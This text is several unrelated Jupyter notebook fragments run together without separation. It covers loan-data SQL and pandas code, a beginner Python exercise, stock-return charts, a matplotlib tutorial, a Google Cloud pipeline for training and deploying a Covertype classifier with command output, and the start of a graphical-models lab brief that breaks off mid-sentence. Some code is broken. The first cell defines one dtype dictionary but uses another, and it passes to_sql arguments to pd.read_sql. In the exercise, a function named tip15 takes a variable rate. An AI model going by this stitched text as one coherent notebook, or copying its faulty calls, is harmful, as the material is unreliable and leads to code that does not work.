df.head(5) # Display features info for our data df.info() # Note that we wrangled and cleaned the above features in our SQL scripts (see notebook) - but below we use sqlalchemy to do it in this python cell again, for clarity: #--> match the columns from above with the '' below: df2_dtype = {'action_taken': sqlalchemy.types.VARCHAR(length=56), 'year': sqlalchemy.types.INTEGER(), 'dn_reason1': sqlalchemy.types.VARCHAR(length=56), 'agency': sqlalchemy.types.VARCHAR(length=56), 'state': sqlalchemy.types.VARCHAR(length=28), 'county': sqlalchemy.types.VARCHAR(length=56), 'ln_type': sqlalchemy.types.VARCHAR(length=56), 'ln_purp': sqlalchemy.types.VARCHAR(length=56), 'ln_amt_000s': sqlalchemy.types.INTEGER(), 'hud_med_fm_inc': sqlalchemy.types.INTEGER(), 'pop': sqlalchemy.types.INTEGER(), 'rt_spread': sqlalchemy.types.NUMERIC(), 'outcome_bucket': sqlalchemy.types.VARCHAR(length=56), 'prc_blw_HS__2013_17_5yrAvg': sqlalchemy.types.INTEGER(), 'prc_HS__2013_17_5yrAvg': sqlalchemy.types.INTEGER(), 'prc_BA_plus__2013_17_5yrAvg': sqlalchemy.types.INTEGER(), 'r_birth_2013': sqlalchemy.types.INTEGER(), 'r_intl_mig_2013': sqlalchemy.types.INTEGER(), 'r_natural_inc_2013': sqlalchemy.types.INTEGER() } # --> using pandas to read Dataframe wth the feature typecasted from the sqlalchemy block above df3 = pd.read_sql (name='loans_2013__training', schema='aa_testing', chunksize=250, # <--- change this dtype= df3_dtype, method=None, con=cnx2, if_exists='replace', index=False) # Using pandas to write Dataframe to PostgreSQL and replacing table if it already exists df3.to_sql(name='loans_2013__training', schema='aa_testing', chunksize=250, dtype= df3_dtype, method=None, con=cnx2, if_exists='replace', index=False) # Statistical counts on our binary target, action_taken - 1 = approved, 0 = denied df['action_taken'].value_counts() # Group the action_taken counts by agency and loan type df.groupby(['action_taken', 'agency_abbr', 'ln_type_nm']).size().unstack(fill_value=0) # Plotting and siple bar graph of loan application outcome: loan_appl_outcome = df['action_taken'].value_counts() plt.figure(figsize=(10,8)) sns.barplot(x=loan_appl_outcome.index, y=loan_appl_outcome.values, alpha = 0.9) plt.title('Loan Application Outcome For 200K Random Sample HMDA Dataset 2010-2017', fontsize = 18) plt.ylabel('Number of Applications', fontsize = 16) plt.xlabel('Loan Application Oucome (1 = approved)', fontsize =16) plt.xticks(rotation = 0) plt.show()Welcome to jupyter notebooks! Congratulations, the hardest step is always the first one. This exercise is designed to help you get personal with the format of jupyter notebooks, as well as learn how data is accessed and manipulated in python.name = "Liz" #type your name before the pound sign, make sure you put it in quotes! age = "135" #type your age before the pound sign, make sure you put it in quotes! More on this later. address = "462C Link Hall" #type your address before the pound sign, make sure you put it in quotes! story = "My name is " + name + ". I am " + age + " years old. I am a data scientist! Find me at " + address + "." print(story)Variable types:Variables are names in your python environment where you store values. A variable can be a number, a character string, or a more complex data structure (such as a pandas spatial dataframe...more later). At the most basic level, variables representing single values can either be numbers or strings. Numeric values can be stored as intergers, floating point numbers, or complex numbers. 
Strings represent strings of characters, like writing. We find out what type of variable we're dealing with by using the type() function.More info here: https://mindmajix.com/python-variable-typesfrom IPython.display import Image Image("https://cdn.mindmajix.com/blog/images/Screenshot_12-460x385.png") print(type(name)) print(type(age)) print(type(address)) print(type(story)) #We can convert numeric strings to numeric formats using either float() or int() age = float(age) print(age) print(type(age)) age=int(age) print(age) print(type(age)) #But we cannot input a numeric value into a string: story = "My name is " + name + ". I am " + age + " years old. Find me at " + address + "." print(story)TASK 1: Edit the code in the above cell so that it will print your story without adding any additional lines of code.#Type story here story = "My name is " + name + ". I am " + str(age) + " years old. Find me at " + address + "." print(story)Mathematical operators in python:We're learning Python because it is a really powerful calculator. Below is a summary of common mathematical operators in Python.Image("https://i0.wp.com/makemeanalyst.com/wp-content/uploads/2017/06/Python-Operators.png") Image("https://i0.wp.com/makemeanalyst.com/wp-content/uploads/2017/06/Relational-Operators-in-Python.png") Image("https://i0.wp.com/makemeanalyst.com/wp-content/uploads/2017/06/Bitwise-Operators_python.png") Image("https://i1.wp.com/makemeanalyst.com/wp-content/uploads/2017/06/Assignment-Operator.png")We can apply mathematical operators to variables by writing equations, just like we do with a calculator. TASK 2:Using your "age" variable. how old will you be in five years (call this variable "a")? How many months have you been alive (we're going to estimate this, based on the fact that there are 12 months in a year, call this variable "b")? Are you older than 100 (call this variable "c")?#first, convert "age" back to a numeric (float) variable age = float(age) #Complete your equations in python syntax below. Remember to use "age" as a variable. a = age + 5 b = age * 12 c = age >= 100 print(a,b,c)FunctionsOften in life, we want to repeat the same sequence of operations on multiple values. To do this, we use functions. Functions are blocks of code that will repeat the same task over and over again (return some outputs) on different variables (inputs). https://docs.python.org/3/tutorial/controlflow.htmldefining-functions#For example, this function squares the input def fun1 (x): return x*x # note the indentation fun1(2) # what happens if you delete the indentation? #Functions can have more than one input: def fun2 (x, y): return x * y fun2(2,3) #experiment with different valuesTASK 3:To simplify your future restaurant interactions, write a function that calculates a 15% tip and adds it to any check amount. Name your function tip15. How much will you owe in total on a $42.75 check?#write tip15 function here def tip15 (check): # check is the bill amount return check * 1.15 tip15(42.75)TASK 4:To customize your future restaurant interactions to future exemplary service, write a function that calculates a variable tip and adds it to any check amount. Name your function tip. 
How much will you owe in total if you're tipping 25% on a $42.75 check?#write tip function here def tip15 (check, rate): # check is the bill amount # rate is the tipping rate expressed as a decimal, for example a 15% tip is .15 return check * (1 + rate) tip15(42.75, .25)ListsUsing base python, you can store multiple variables as a list by wrapping them in square brackets. A list can accept any kind of variable: float, integer, or string:names = ["Homer", "Marge", "Bart", "Maggie", "Lisa"] ages = [40,39,11,1,9] print(names) print(ages) type(names) type(ages)We can make lists of lists, which are more complex data objects:names_and_ages = [names, ages] print(names_and_ages) type(names_and_ages)We can extract individual values from the list using **indexing**, which in python starts with zero. We'd use our python mathematical operator on this single variable the same way we would use a calculator. For example, the age of the first person in the list is:first = ages[0] print(first)And we can ask: How old will the first numeric element on our list be in five years?ages[0]+5TASK 5:Find the name and age of the third person in your list# type answer here print(names[2]+ ' is ' + str(ages[2]) + " years old.")TASK 6:Add an extra person to the list, named Grandpa, who is 67 years old. *Hint: Google "add values to a list python" if you're not sure what to do!!!!# type answer here names.append("Grandpa") ages.append(67) print(names_and_ages)TASK 7:Maggie just had a birthday! Change her age accordingly in the list.# type answer here names_and_ages[1][3] = names_and_ages[1][3]+1 print(names_and_ages)But because lists can be either string or numeric, we cannot apply a mathematical operator to a list. For example, how old will everyone be in five years?ages + 5 #this returns an error. But hey! Errors are opportunities! Google your error message, see if you can find a workaround!For loopsOne way that we can run an entire operation on a list is to use a for loop. A for loop iterates through every element of a sequence, and completes a task or a set of tasks. Example:#Measure some strings words = ['cat', 'window', 'defenestrate'] for w in words: print(w, len(w))A very handy function that folks use a lot when write for loops is the range function. range() creates a range object, which generates list of intergers for each element in a series.print(len(ages)) # What does len() do? print(range(len(ages))) for y in range(len(ages)): print(ages[y])TASK 8:Use the range function in a for loop to add 1 year to everyone's age in the names_and_ages list and print the result to the screen.# type your for loop here for y in range(len(ages)): ages[y] = ages[y] + 1 print(names_and_ages)if/else statementsAnother thing that is commonly used in for loops is an if/else statement. This allows us to select certain attributes that we want to use to treat elements that we're iterating over differently.for y in range(len(ages)): if ages[y]>=18: print(names[y] + " is an adult") elif ages[y] >= 10: print(names[y]+" is an adolescent") else: print(names[y] + " is a child")The above statement reads: if the age of the person is greater than or equal to 18, the person is an adult, or else if the age of the person is greater than or equal to 10, the person is an adolescent, or else the person is a child.Pay attention to the use of indentation in the above statement! 
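One more point before the task: the branches are evaluated top to bottom and the first true condition wins, so the stricter cutoff (>= 18) has to come before the broader one (>= 10). A small illustrative snippet (not part of the original exercise) showing what goes wrong otherwise:
```python
# With the broader check first, an adult is mislabelled, because 40 >= 10 is already True
# and the first matching branch wins.
age_check = 40
if age_check >= 10:
    print("adolescent")   # this is what gets printed
elif age_check >= 18:
    print("adult")        # never reached with this ordering
else:
    print("child")
```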
TASK 9:Using if, elif, and/or else statements, write a for loop that adds 1 year to everyone's life except Maggie...since we already gave her an extra birthday.# Write for loop here for y in range(len(ages)): if names[y] != "Maggie": ages[y] = ages[y] + 1 print(names_and_ages)numpy arrays and pandas dataframes For loops can take a lot of time on large datasets. To deal with this issue, we can rely on two other packages for data structures, called numpy and pandas. *Packages* are collections of *modules*. *Modules* contain executables, functions, and object types that someone else has already written for you.Numpy arrays are standard gridded data formats (lists, matrices, and multi-dimensional arrays) where all items are of one data type, and have implicit indexing. Pandas data frames allow for mixed data types to be stored in different columns, and have explicit indicing. Pandas data frames work just like excel spreadsheets. Check out [https://www.earthdatascience.org/courses/intro-to-earth-data-science/scientific-data-structures-python/numpy-arrays/] and [https://www.earthdatascience.org/courses/intro-to-earth-data-science/scientific-data-structures-python/pandas-dataframes/] to learn more. Either numpy arrays or pandas data frames allow mathematical operators to be applied to all numeric elements.We're going to start off by loading the numpy and pandas packages. We're going to short their names to "np" and "pd", just so we don't have to type as many characters. These packages should have been downloaded automatically in Anaconda, but if you can't load them, raise your hand and share you're screen. We'll talk about installing packages and everyone will be all the wiser.Note: if importing python packages is new to you, please check out [https://www.earthdatascience.org/courses/intro-to-earth-data-science/python-code-fundamentals/use-python-packages/] to learn more.import numpy as np #import the numpy package, and call it np ages = np.array(ages) ages + 5 #Wait! Did you get an error? Read it carefull...and if it doesn't make sense, try Googling it. import pandas as pd #import the pandas pacakge, and call it pd names_and_ages = pd.DataFrame({'names':names,'ages':ages}) print(names_and_ages) type(names_and_ages) #How does the "type" of variable change?The cell bellow shows how to add a new column to a pandas data frame called 'ages_5yr', and how to calculate values for the new column:names_and_ages['ages_5yr']=names_and_ages.ages + 5 print(names_and_ages)There are three(?) ways to select a column in a pandas dataframe:*? = probably many more!print(names_and_ages['names']) #index by column name print(names_and_ages.names) #call column name as an object attribute print(names_and_ages.iloc[:,0]) #use pandas built-in indexing functionThe last option, iloc, is a pandas function. The first slot (before the comma) tells us which *rows* to pick. The second slot (after the comma) tells us which *columns* to pick. 
To pick find the value "ages_5yrs" of the first row, for example, we could use iloc like this:print(names_and_ages.iloc[0,2])TASK 10:Create a new column in names_and_ages called "age_months", and populate it with each indiviuals age in months (approximately age in years times 12).#Complete task ten in the space below names_and_ages['age_months'] = names_and_ages.ages*12 names_and_agesTASK 11:Create a new column in names_and_ages called "maturity", and populate it with "adult", "adolescent", and "child", based on the age cutoffs mentioned above.# Create new column, fill it with empty values (np.NaN) names_and_ages['maturity']=np.NaN # Write for loop here for i in range(names_and_ages.shape[0]): if names_and_ages.ages[i]>= 18: names_and_ages.maturity.iloc[i] = "adult" elif names_and_ages.ages[i]>=10: names_and_ages.maturity.iloc[i] = "adolescent" else: names_and_ages.maturity.iloc[i] = "child" print(names_and_ages)Read in data.You will often be using python to process files or data stored locally on your computer or server. Here will learn how to use the package os to set a path to the files you want, called your working directory.import os os.listdir()This .csv file is a record of daily discharge from a USGS stream gage near campus for the past year. It contains two columns, "Date" and "Discharge". It was downloaded with some modifications from [https://maps.waterdata.usgs.gov/mapper/index.html]. This is a great source of data for surface water measurements!Now that you've got the filepath set up so that python can see your stream discharge data, let's open it as a pandas data frame using the pandas.read_csv() function. This is similar to what we would do opening new data in Excelstream = pd.read_csv('USGS_04240105_SYRACUSE_NY.csv', infer_datetime_format=True) print(type(stream)) #the "head" function is built into a pandas.DataFrame object, and it allows you to specify the number of rows you want to see stream.head(5)Here, we see the date (as "%m/%d/%Y" format) and the mean daily discharge in cubic feet/second measured by the streamgage for each day. Check documentation on an objectThe pandas dataframe is an object that is associated with many attributes and functions. How can we tell what other people have enabled their modules to do, and learn how to use them?Remember, we just read in our data (USGS_04240105_SYRACUSE_NY.csv") as a 'pandas.core.frame.DataFrame'. What does that mean?#We can ask a question: ?stream #We can ask a deeper queston: ??stream #This gives you full documentation #Or we can use the 'dot' 'tab' magic. stream. #Don't click Enter!!! Click 'Tab'. What happens? #We can use 'dot' 'tab' and question marks together! ?stream.minTASK 12: use pandas.DataFrame built in functions to determine the minimum, maximum, and mean daily discharge over the record for the station.#use pandas.DataFrame functions to assign appropriate values to the variables here. min_dis = stream.Discharge.min() max_dis = stream.Discharge.max() mean_dis = stream.Discharge.mean() print(min_dis, max_dis, mean_dis)TASK 13: create a new column called "Discharge_total" where cumulative daily discharge is calculated (hint: there are 24 x 60 x 60 seconds in a day)#enter calculations here stream['Discharge_total'] = stream.Discharge*24*60*60 stream.head()EXTRA CREDIT: Use indexing to determine the DATE on which the maximum daily discharge occured.(Hint! check out ?stream.iloc and ?stream.argmax, then try Googling "Find row where value of column is maximum in pandas DataFrame" or something similar)(Still stuck? 
Enter the last thing you tried in this box, and then post your unsolved code on the Questions and Answers page on blackboard).#Type your answer here, see if you can get it in one line of code! stream.Date.iloc[stream['Discharge'].idxmax()]Annual Returns & Monthly Returnsimport numpy as np import matplotlib.pyplot as plt; plt.rcdefaults() import pandas as pd import warnings warnings.filterwarnings("ignore") # yfinance is used to fetch data import yfinance as yf yf.pdr_override() # input symbol = 'AMD' start = '2007-01-01' end = '2019-01-01' # Read data dataset = yf.download(symbol,start,end) # View Data dataset.head() dataset.tail() plt.figure(figsize=(16,8)) plt.plot(dataset['Adj Close']) plt.title('Closing Price Chart') plt.xlabel('Date') plt.ylabel('Price') plt.grid(True) plt.show() monthly = dataset.asfreq('BM') monthly['Returns'] = dataset['Adj Close'].pct_change().dropna() monthly.head() monthly['Month_Name'] = monthly.index.strftime("%b") monthly['Month_Name_Year'] = monthly.index.strftime("%b-%Y") import calendar import datetime monthly = monthly.reset_index() monthly['Month'] = monthly["Date"].dt.month monthly.head() monthly.head() monthly.tail() monthly['Returns'].plot(kind='bar', figsize=(30,6)) plt.xlabel("Months") plt.ylabel("Returns") plt.title("Returns for Each Month") plt.show() monthly['Returns'].plot(kind='bar', figsize=(30,6)) plt.xlabel("Months") plt.ylabel("Returns") plt.title("Returns for Each Month") plt.xticks(monthly.index, monthly['Month_Name']) plt.show() from matplotlib import dates as mdates import datetime as dt monthly['ReturnsPositive'] = 0 < monthly['Returns'] monthly['Date'] = pd.to_datetime(monthly['Date']) monthly['Date'] = monthly['Date'].apply(mdates.date2num) colors = monthly.ReturnsPositive.map({True: 'g', False: 'r'}) monthly['Returns'].plot(kind='bar', color = colors, figsize=(30,6)) plt.xlabel("Months") plt.ylabel("Returns") plt.title("Returns for Each Month " + start + ' to ' + end) plt.xticks(monthly.index, monthly['Month_Name']) plt.show() yearly = dataset.asfreq('BY') yearly['Returns'] = dataset['Adj Close'].pct_change().dropna() yearly yearly = yearly.reset_index() yearly yearly['Years'] = yearly['Date'].dt.year yearly plt.figure(figsize=(10,5)) plt.bar(yearly['Years'], yearly['Returns'], align='center') plt.title('Yearly Returns') plt.xlabel('Date') plt.ylabel('Returns') plt.show() from matplotlib import dates as mdates import datetime as dt yearly['ReturnsPositive'] = 0 < yearly['Returns'] yearly['Date'] = pd.to_datetime(yearly['Date']) yearly['Date'] = yearly['Date'].apply(mdates.date2num) yearly colors = yearly.ReturnsPositive.map({True: 'g', False: 'r'}) plt.figure(figsize=(10,5)) plt.bar(yearly['Years'], yearly['Returns'], color=colors, align='center') plt.title('Yearly Returns') plt.xlabel('Date') plt.ylabel('Returns') plt.show() dataset['Returns'] = dataset['Adj Close'].pct_change().dropna() yearly_returns_avg = dataset['Returns'].groupby([dataset.index.year]).mean() yearly_returns_avg colors = yearly.ReturnsPositive.map({True: 'g', False: 'r'}) plt.figure(figsize=(10,5)) plt.bar(yearly['Years'], yearly['Returns'], color=colors, align='center') plt.plot(yearly_returns_avg, marker='o', color='b') plt.title('Yearly Returns') plt.xlabel('Date') plt.ylabel('Returns') plt.show()What is Matplotlib?Matplotlib is a low level graph plotting library in python that serves as a visualization utility.Matplotlib was created by .Matplotlib is open source and we can use it freely.Matplotlib is mostly written in python, a few segments are written in C, 
Objective-C and Javascript for Platform compatibility.import matplotlib print(matplotlib.__version__) import matplotlib.pyplot as plt import numpy as np xpoints = np.array([0,6]) ypoints = np.array([0, 250]) plt.plot(xpoints, ypoints) plt.show() #Plotting Without Line #To plot only the markers, you can use shortcut string notation parameter 'o', which means 'rings'. xpoints = np.array([1, 8]) ypoints = np.array([3, 10]) plt.plot(xpoints, ypoints, 'o') plt.show() # Multiple Points xpoints = np.array([1, 2, 6, 8]) ypoints = np.array([3, 8, 1, 10]) plt.plot(xpoints, ypoints) plt.show() # Markers ypoints = np.array([3, 8, 1, 10]) plt.plot(ypoints, marker='o') plt.show() plt.plot(ypoints, marker='*') plt.show() plt.plot(ypoints, 'o:r', ms=10, mec='#4CAF50', mfc='#4CAF50') plt.show() #Matplotlib Line ypoints = np.array([3, 8, 1, 10]) plt.plot(ypoints, linestyle='dotted') plt.show() plt.plot(ypoints, linestyle='dashed') plt.show() # Multilines y1 = np.array([3, 8, 1, 10]) y2 = np.array([6, 2, 7, 11]) plt.plot(y1) plt.plot(y2) plt.show() # Mathplotlib Labels and Title x = np.array([80, 85, 90, 95, 100, 105, 110, 115, 120, 125]) y = np.array([240, 250, 260, 270, 280, 290, 300, 310, 320, 330]) plt.plot(x, y) plt.title("Sports Watch Data", loc="left") plt.xlabel("Average Pulse") plt.ylabel("Calorie Burnage") plt.grid() plt.show()The subplots() FunctionThe subplots() function takes three arguments that describes the layout of the figure.The layout is organized in rows and columns, which are represented by the first and second argument.The third argument represents the index of the current plot.```pythonplt.subplot(1, 2, 1)the figure has 1 row, 2 columns, and this plot is the first plot.```# Subplots #plot 1: x = np.array([0, 1, 2, 3]) y = np.array([3, 8, 1, 10]) plt.subplot(1, 2, 1) plt.plot(x, y) #plot 2: x = np.array([0, 1, 2, 3]) y = np.array([10, 20, 30, 40]) plt.subplot(1, 2, 2) plt.plot(x, y) plt.show() #plot 1: x = np.array([0, 1, 2, 3]) y = np.array([3, 8, 1, 10]) plt.subplot(2, 1, 1) plt.plot(x, y) #plot 2: x = np.array([0, 1, 2, 3]) y = np.array([10, 20, 30, 40]) plt.subplot(2, 1, 2) plt.plot(x, y) plt.suptitle("سلام") plt.show()Importing packages--- __We need to run the scripts install requirements.sh__import json import os import numpy as np import pandas as pd import pickle import uuid import time import tempfile from googleapiclient import discovery from googleapiclient import errors from google.cloud import bigquery from jinja2 import Template from kfp.components import func_to_container_op from typing import NamedTuple from sklearn.metrics import accuracy_score from sklearn.model_selection import train_test_split from sklearn.linear_model import SGDClassifier from sklearn.pipeline import Pipeline from sklearn.preprocessing import StandardScaler, OneHotEncoder from sklearn.compose import ColumnTransformer !(gcloud config get-value core/project)zeta-rush-341516Preparing the dataset--PROJECT_ID = !(gcloud config get-value core/project) PROJECT_ID = PROJECT_ID[0] DATASET_ID='covertype_dataset' DATASET_LOCATION='US' TABLE_ID='covertype' DATA_SOURCE='gs://workshop-datasets/covertype/small/dataset.csv' SCHEMA='Elevation:INTEGER,Aspect:INTEGER,Slope:INTEGER,Horizontal_Distance_To_Hydrology:\ INTEGER,Vertical_Distance_To_Hydrology:INTEGER,Horizontal_Distance_To_Roadways:INTEGER,Hillshade_9am:\ INTEGER,Hillshade_Noon:INTEGER,Hillshade_3pm:INTEGER,Horizontal_Distance_To_Fire_Points:INTEGER,\ Wilderness_Area:STRING,Soil_Type:STRING,Cover_Type:INTEGER'__We create the BigQuery dataset and upload the 
Covertype csv data into a table__ __The pipeline ingests data from BigQuery. The cell below uploads the Covertype dataset to BigQuery__!bq --location=$DATASET_LOCATION --project_id=$PROJECT_ID mk --dataset $DATASET_ID !bq --project_id=$PROJECT_ID --dataset_id=$DATASET_ID load \ --source_format=CSV \ --skip_leading_rows=1 \ --replace \ $TABLE_ID \ $DATA_SOURCE \ $SCHEMAWaiting on bqjob_r1a261ada7bedac6e_0000017f95549ef8_1 ... (2s) Current status: DONEConfiguring environment settings---!gsutil ls REGION = 'us-central1' ARTIFACT_STORE = 'gs://mlops-youness' PROJECT_ID = !(gcloud config get-value core/project) PROJECT_ID = PROJECT_ID[0] DATA_ROOT='{}/data'.format(ARTIFACT_STORE) JOB_DIR_ROOT='{}/jobs'.format(ARTIFACT_STORE) TRAINING_FILE_PATH='{}/{}/{}'.format(DATA_ROOT, 'training', 'dataset.csv') VALIDATION_FILE_PATH='{}/{}/{}'.format(DATA_ROOT, 'validation', 'dataset.csv')Exploring the Covertype dataset--%%bigquery SELECT * FROM `covertype_dataset.covertype`Query complete after 0.00s: 100%|██████████| 2/2 [00:00<00:00, 1215.56query/s] Downloading: 100%|██████████| 100000/100000 [00:01<00:00, 92715.65rows/s]Creating a training split-- __We Run the query below in order to have repeatable sampling of the data in BigQuery__!bq query \ -n 0 \ --destination_table covertype_dataset.training \ --replace \ --use_legacy_sql=false \ 'SELECT * \ FROM `covertype_dataset.covertype` AS cover \ WHERE \ MOD(ABS(FARM_FINGERPRINT(TO_JSON_STRING(cover))), 10) IN (1, 2, 3, 4)'Waiting on bqjob_r62de6020f6501c97_0000017f9555177a_1 ... (1s) Current status: DONE__We export the BigQuery training table to GCS at $TRAINING_FILE_PATH__!bq extract \ --destination_format CSV \ covertype_dataset.training \ $TRAINING_FILE_PATHWaiting on bqjob_r1a578ffe791da479_0000017f95552b1d_1 ... (0s) Current status: DONECreating a validation split--- __We create a validation split that takes 10% of the data using the `bq` command and export this split into the BigQuery table `covertype_dataset.validation`__!bq query \ -n 0 \ --destination_table covertype_dataset.validation \ --replace \ --use_legacy_sql=false \ 'SELECT * \ FROM `covertype_dataset.covertype` AS cover \ WHERE \ MOD(ABS(FARM_FINGERPRINT(TO_JSON_STRING(cover))), 10) IN (8)' !bq extract \ --destination_format CSV \ covertype_dataset.validation \ $VALIDATION_FILE_PATH TRAINING_FILE_PATH, VALIDATION_FILE_PATH df_train = pd.read_csv(TRAINING_FILE_PATH) df_validation = pd.read_csv(VALIDATION_FILE_PATH) print(df_train.shape) print(df_validation.shape)(40009, 13) (9836, 13)The training application-- The training pipeline preprocesses data by standardizing all numeric features using `sklearn.preprocessing.StandardScaler` and encoding all categorical features using `sklearn.preprocessing.OneHotEncoder`. 
It uses stochastic gradient descent linear classifier (SGDClassifier) for modeling.numeric_feature_indexes = slice(0, 10) categorical_feature_indexes = slice(10, 12) preprocessor = ColumnTransformer( transformers=[ ('num', StandardScaler(), numeric_feature_indexes), ('cat', OneHotEncoder(), categorical_feature_indexes) ]) pipeline = Pipeline([ ('preprocessor', preprocessor), ('classifier', SGDClassifier(loss='log', tol=1e-3)) ]) num_features_type_map = {feature: 'float64' for feature in df_train.columns[numeric_feature_indexes]} df_train = df_train.astype(num_features_type_map) df_validation = df_validation.astype(num_features_type_map)__Run the pipeline locally.__X_train = df_train.drop('Cover_Type', axis=1) y_train = df_train['Cover_Type'] X_validation = df_validation.drop('Cover_Type', axis=1) y_validation = df_validation['Cover_Type'] pipeline.set_params(classifier__alpha=0.001, classifier__max_iter=200) pipeline.fit(X_train, y_train) accuracy = pipeline.score(X_validation, y_validation) print(accuracy)0.6982513216754779__Prepare the hyperparameter tuning application.__TRAINING_APP_FOLDER = 'training_app' os.makedirs(TRAINING_APP_FOLDER, exist_ok=True) IMAGE_NAME='trainer_image' IMAGE_TAG='latest' IMAGE_URI='gcr.io/{}/{}:{}'.format(PROJECT_ID, IMAGE_NAME, IMAGE_TAG) IMAGE_URI__Build the docker image__!gcloud builds submit --tag $IMAGE_URI $TRAINING_APP_FOLDERCreating temporary tarball archive of 6 file(s) totalling 6.0 KiB before compression. Uploading tarball of [training_app] to [gs://zeta-rush-341516_cloudbuild/source/1647477979.084049-6af7f304c194456c88a30a32f6ef1f0f.tgz] Created [https://cloudbuild.googleapis.com/v1/projects/zeta-rush-341516/locations/global/builds/3d083302-0757-42da-a50a-341705ff8e6b]. Logs are available at [https://console.cloud.google.com/cloud-build/builds/3d083302-0757-42da-a50a-341705ff8e6b?project=156920671469]. ----------------------------- REMOTE BUILD OUTPUT ------------------------------ starting build "3d083302-0757-42da-a50a-341705ff8e6b" FETCHSOURCE Fetching storage object: gs://zeta-rush-341516_cloudbuild/source/1647477979.084049-6af7f304c194456c88a30a32f6ef1f0f.tgz#1647477979401432 Copying gs://zeta-rush-341516_cloudbuild/source/1647477979.084049-6af7f304c194456c88a30a32f6ef1f0f.tgz#1647477979401432... 
/ [1 files][ 1.7 KiB/ 1.7 KiB] Operation completed[...]__Submit an AI Platform hyperparameter tuning job__JOB_NAME = "JOB_{}".format(time.strftime("%Y%m%d_%H%M%S")) JOB_DIR = "{}/{}".format(JOB_DIR_ROOT, JOB_NAME) SCALE_TIER = "BASIC" !gcloud ai-platform jobs submit training $JOB_NAME \ --region=$REGION \ --job-dir=$JOB_DIR \ --master-image-uri=$IMAGE_URI \ --scale-tier=$SCALE_TIER \ --config $TRAINING_APP_FOLDER/hptuning_config.yaml \ -- \ --training_dataset_path=$TRAINING_FILE_PATH \ --validation_dataset_path=$VALIDATION_FILE_PATH \ --hptune JOB_NAME !gcloud ai-platform jobs describe $JOB_NAMEcreateTime: '2022-03-17T00:49:39Z' etag: v-ELqiuttJU= jobId: JOB_20220317_004937 jobPosition: '0' startTime: '2022-03-17T00:49:43Z' state: RUNNING trainingInput: args: - --training_dataset_path=gs://mlops-youness/data/training/dataset.csv - --validation_dataset_path=gs://mlops-youness/data/validation/dataset.csv - --hptune hyperparameters: enableTrialEarlyStopping: true goal: MAXIMIZE hyperparameterMetricTag: accuracy maxParallelTrials: 2 maxTrials: 4 params: - discreteValues: - 200.0 - 500.0 parameterName: max_iter type: DISCRETE - maxValue: 0.001 minValue: 1e-05 parameterName: alpha scaleType: UNIT_LINEAR_SCALE type: DOUBLE jobDir: gs://mlops-youness/jobs/JOB_20220317_004937 masterConfig: imageUri: gcr.io/zeta-rush-341516/trainer_image:latest region: us-central1 trainingOutput: hyperparameterMetricTag: accuracy isHyperparameterTuningJob: true View job in the Cloud Console at: http[...]__Retrieve HP-tuning results__ml = discovery.build('ml', 'v1') job_id = 'projects/{}/jobs/{}'.format(PROJECT_ID, JOB_NAME) request = ml.projects().jobs().get(name=job_id) try: response = request.execute() except errors.HttpError as err: print(err) except: print("Unexpected error") response response['trainingOutput']['trials'][0]__Retrain the model with the best hyperparameters__alpha = response['trainingOutput']['trials'][0]['hyperparameters']['alpha'] max_iter = response['trainingOutput']['trials'][0]['hyperparameters']['max_iter'] JOB_NAME = "JOB_{}".format(time.strftime("%Y%m%d_%H%M%S")) JOB_DIR = "{}/{}".format(JOB_DIR_ROOT, JOB_NAME) SCALE_TIER = "BASIC" !gcloud ai-platform jobs submit training $JOB_NAME \ --region=$REGION \ --job-dir=$JOB_DIR \ --master-image-uri=$IMAGE_URI \ --scale-tier=$SCALE_TIER \ -- \ --training_dataset_path=$TRAINING_FILE_PATH \ --validation_dataset_path=$VALIDATION_FILE_PATH \ --alpha=$alpha \ --max_iter=$max_iter \ --nohptune !gcloud ai-platform jobs describe $JOB_NAME !gsutil ls $JOB_DIRgs://mlops-youness/jobs/JOB_20220317_012710/model.pklDeploy the model to AI Platform Prediction--model_name = 'forest_cover_classifier' labels = "task=classifier,domain=forestry" !gcloud ai-platform models create $model_name \ --regions=$REGION \ --labels=$labelsUsing endpoint [https://ml.googleapis.com/] Created ai platform model [projects/zeta-rush-341516/models/forest_cover_classifier].__Create a model version__model_version = 'v01' !gcloud ai-platform versions create {model_version} \ --model={model_name} \ --origin=$JOB_DIR \ --runtime-version=1.15 \ --framework=scikit-learn \ --python-version=3.7\ --region globalUsing endpoint [https://ml.googleapis.com/] Creating version (this might take a few minutes)......done.__Serve predictions__ : Prepare the input file with JSON formated instances.input_file = 'serving_instances.json' with open(input_file, 'w') as f: for index, row in X_validation.head().iterrows(): f.write(json.dumps(list(row.values))) f.write('\n') !cat $input_file[2841.0, 45.0, 0.0, 
644.0, 282.0, 1376.0, 218.0, 237.0, 156.0, 1003.0, "Commanche", "C4758"] [2494.0, 180.0, 0.0, 0.0, 0.0, 819.0, 219.0, 238.0, 157.0, 5531.0, "Rawah", "C6101"] [3153.0, 90.0, 0.0, 335.0, 11.0, 5842.0, 219.0, 237.0, 155.0, 930.0, "Rawah", "C7101"] [3021.0, 90.0, 0.0, 42.0, 1.0, 4389.0, 219.0, 237.0, 155.0, 902.0, "Rawah", "C7745"] [2916.0, 0.0, 0.0, 0.0, 0.0, 4562.0, 218.0, 238.0, 156.0, 5442.0, "Rawah", "C7745"]__Invoke the model__!gcloud ai-platform predict \ --model $model_name \ --version $model_version \ --json-instances $input_file\ --region globalUsing endpoint [https://ml.googleapis.com/] [1, 1, 0, 1, 1]Lab 2: Inference in Graphical Models Machine Learning 2 (2016/2017)* The lab exercises should be made in groups of two people or individually.* The hand-in deadline is Wednesday, May 10, 23:59.* Assignment should be sent to . The subject line of your email should be "[ML2_2017] lab_lastname1\_lastname2". * Put your and your teammates' names in the body of the email* Attach the .IPYNB (IPython Notebook) file containing your code and answers. Naming of the file follows the same rule as the subject line. For example, if the subject line is "[ML2_2017] lab02\_Bongers\_Blom", the attached file should be "lab02\_Bongers\_Blom.ipynb". Only use underscores ("\_") to connect names, otherwise the files cannot be parsed.Notes on implementation:* You should write your code and answers in an IPython Notebook: http://ipython.org/notebook.html. If you have problems, please ask or e-mail Philip.* For some of the questions, you can write the code directly in the first code cell that provides the class structure.* Among the first lines of your notebook should be "%pylab inline". This imports all required modules, and your plots will appear inline.* NOTE: test your code and make sure we can run your notebook / scripts! IntroductionIn this assignment, we will implement the sum-product and max-sum algorithms for factor graphs over discrete variables. The relevant theory is covered in chapter 8 of Bishop's PRML book, in particular section 8.4. Read this chapter carefuly before continuing!We will first implement sum-product and max-sum and apply it to a simple poly-tree structured factor graph for medical diagnosis. Then, we will implement a loopy version of the algorithms and use it for image denoising.For this assignment we recommended you stick to numpy ndarrays (constructed with np.array, 